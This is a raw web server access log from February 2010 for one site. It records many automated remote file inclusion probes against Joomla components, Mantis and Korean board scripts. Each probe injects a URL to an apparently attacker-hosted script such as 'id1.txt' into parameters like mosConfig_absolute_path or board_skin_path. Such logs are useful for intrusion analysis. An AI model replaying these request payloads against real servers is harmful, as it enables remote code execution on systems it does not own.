64.15.158.246 - - [11/Feb/2010:07:11:45 -0800] "GET /logs/access_100105.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:11:47 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:11:47 -0800] "GET /logs/access_100103.log//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:11:47 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [11/Feb/2010:07:12:09 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:07:13:08 -0800] "GET /logs/access_100109.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:13:12 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:13:12 -0800] "GET /logs/access_100122.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:13:17 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:13:24 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:13:24 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:13:25 -0800] "GET /logs/access_100122.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:13:52 -0800] "GET /logs/access_100208.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:13:52 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:13:53 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:13:58 -0800] "GET /logs/access_100208.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:13:58 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:13:59 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:14:00 -0800] "GET /logs/access_100208.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:14:00 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:14:00 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:14:38 -0800] "GET /logs/access_100103.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:14:52 -0800] "GET /logs/access_100103.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:14:52 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:14:52 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:15:01 -0800] "GET /logs/access_100103.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:15:37 -0800] "GET /logs/access_100103.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:07:15:57 -0800] "GET /logs/access_100128.log//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:07:15:57 -0800] "GET /delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:07:15:57 -0800] "GET /logs//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:16:00 -0800] "GET /logs/access_100103.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:16:00 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:16:00 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:07:16:11 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:07:16:11 -0800] "GET /logs/access_100115.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:07:16:11 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:07:16:15 -0800] "GET /logs/access_100128.log//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:07:16:15 -0800] "GET /delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:07:16:15 -0800] "GET /logs//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:17:07 -0800] "GET /delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:17:07 -0800] "GET /logs//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:17:07 -0800] "GET /logs/access_100125.log%20%20//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:17:12 -0800] "GET /delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:17:13 -0800] "GET /logs/access_100125.log%20%20//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:17:13 -0800] "GET /logs//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:17:44 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:17:44 -0800] "GET /logs/access_100208.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:17:58 -0800] "GET /logs/access_100112.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:18:02 -0800] "GET /logs/access_100103.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:18:02 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:18:02 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
89.166.50.90 - - [11/Feb/2010:07:18:07 -0800] "GET /logs/index.php?_REQUEST=Array&_REQUEST_Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
89.166.50.90 - - [11/Feb/2010:07:18:07 -0800] "GET /index.php?_REQUEST=Array&_REQUEST_Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
89.166.50.90 - - [11/Feb/2010:07:18:07 -0800] "GET /logs/index.php?_REQUEST=Array&_REQUEST_Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/templates/bo.do?? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
89.166.50.90 - - [11/Feb/2010:07:18:07 -0800] "GET /index.php?_REQUEST=Array&_REQUEST_Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/templates/bo.do?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:18:16 -0800] "GET /logs/access_100208.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:18:16 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:18:16 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:18:32 -0800] "GET /logs/access_100208.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:18:32 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:18:32 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:07:19:02 -0800] "GET /logs/access_100128.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:19:05 -0800] "GET /logs/access_100125.log//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:19:05 -0800] "GET /delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:19:06 -0800] "GET /logs//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:19:22 -0800] "GET /logs/access_100112.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:19:26 -0800] "GET /delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:19:26 -0800] "GET /logs//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:19:26 -0800] "GET /logs/access_100125.log//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.222.11 - - [11/Feb/2010:07:19:43 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.222.11 - - [11/Feb/2010:07:19:43 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.222.11 - - [11/Feb/2010:07:19:43 -0800] "GET /logs/access_100118.log%20%20/mantis/login_page.php?g_meta_include_file=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:19:49 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.222.11 - - [11/Feb/2010:07:19:57 -0800] "GET /logs/access_100117.log%20%20/mantis/login_page.php?g_meta_include_file=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [11/Feb/2010:07:20:05 -0800] "GET /logs/write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [11/Feb/2010:07:20:05 -0800] "GET /write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [11/Feb/2010:07:20:05 -0800] "GET /logs/access_100202.log%20%20/write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:20:08 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [11/Feb/2010:07:20:22 -0800] "GET /logs/access_100131.log%20%20/write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:20:26 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:20:58 -0800] "GET /logs/access_100112.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:07:21:21 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.222.11 - - [11/Feb/2010:07:22:11 -0800] "GET /logs/access_100118.log/mantis/login_page.php?g_meta_include_file=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.222.11 - - [11/Feb/2010:07:22:16 -0800] "GET /logs/access_100117.log/mantis/login_page.php?g_meta_include_file=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:07:22:26 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:07:22:26 -0800] "GET /ideal/forum/viewtopic.php?p=30346 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
60.251.165.181 - - [11/Feb/2010:07:22:53 -0800] "GET /logs/access_100122.log/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [11/Feb/2010:07:22:55 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [11/Feb/2010:07:22:56 -0800] "GET /logs/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [11/Feb/2010:07:23:12 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:07:23:36 -0800] "GET /delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:07:23:36 -0800] "GET /logs/access_100128.log%20%20//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:07:23:36 -0800] "GET /logs//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:07:23:38 -0800] "GET /logs/access_100128.log%20%20//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:07:23:38 -0800] "GET /logs//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:07:23:38 -0800] "GET /delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.206.226.54 - - [11/Feb/2010:07:23:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
203.206.226.54 - - [11/Feb/2010:07:23:48 -0800] "GET /logs/access_100109.log%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
203.206.226.54 - - [11/Feb/2010:07:23:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
125.160.17.201 - - [11/Feb/2010:07:24:28 -0800] "GET /logs/access_100128.log%20%20/index.php?option=com_remository&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [11/Feb/2010:07:24:28 -0800] "GET /logs/index.php?option=com_remository&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [11/Feb/2010:07:24:29 -0800] "GET /index.php?option=com_remository&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [11/Feb/2010:07:24:53 -0800] "GET /logs/access_100130.log%20%20/index.php?option=com_remository&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [11/Feb/2010:07:25:56 -0800] "GET //bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [11/Feb/2010:07:25:56 -0800] "GET /logs///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [11/Feb/2010:07:25:56 -0800] "GET /logs/access_100202.log///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [11/Feb/2010:07:25:56 -0800] "GET /logs/access_100121.log///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [11/Feb/2010:07:26:09 -0800] "GET /logs/access.log/administrator/components/com_clickheat/Recly_Config.php=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [11/Feb/2010:07:26:19 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [11/Feb/2010:07:26:22 -0800] "GET /logs/access_100112.log/administrator/components/com_clickheat/Recly_Config.php=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [11/Feb/2010:07:27:46 -0800] "GET /logs/access_100126.log%20%20///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [11/Feb/2010:07:28:18 -0800] "GET /logs/access_100126.log%20%20///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:28:33 -0800] "GET /logs/access_100107.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:28:33 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:28:34 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:29:15 -0800] "GET /logs/access_100202.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:29:46 -0800] "GET /logs/access_100107.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:29:46 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:29:46 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [11/Feb/2010:07:29:54 -0800] "GET /logs/access_100202.log/write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:30:00 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:30:00 -0800] "GET /logs/access_100107.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:30:00 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:30:00 -0800] "GET /logs/access_100107.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
